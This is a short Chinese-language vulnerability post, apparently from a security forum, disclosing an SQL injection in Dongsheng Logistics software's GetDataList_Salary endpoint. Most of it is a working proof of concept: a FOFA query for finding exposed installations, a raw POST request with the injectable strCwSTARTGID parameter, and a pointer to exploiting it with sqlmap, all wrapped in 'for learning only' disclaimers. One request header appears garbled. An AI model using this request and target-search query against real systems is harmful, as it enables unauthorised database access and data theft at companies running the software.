免责声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
漏洞描述:
东胜物流的/TruckMng/MsWlDriver/GetDataList_Salary接口存在SQL注入
影响版本:
FOFA:
app="东胜物流软件-物流软件"
POC:
POST /TruckMng/MsWlDriver/GetDataList_Salary?
_dc=1665626804091&start=0&limit=30&sort=&condition=1*&page=1 HTTP/1.1
Host:
Content-Type: application/x-!""-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Length: 448
strCwSTARTGID=1'
可以使用SQLmap对strCwSTARTGID参数进行利用。
——–
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
没有回复内容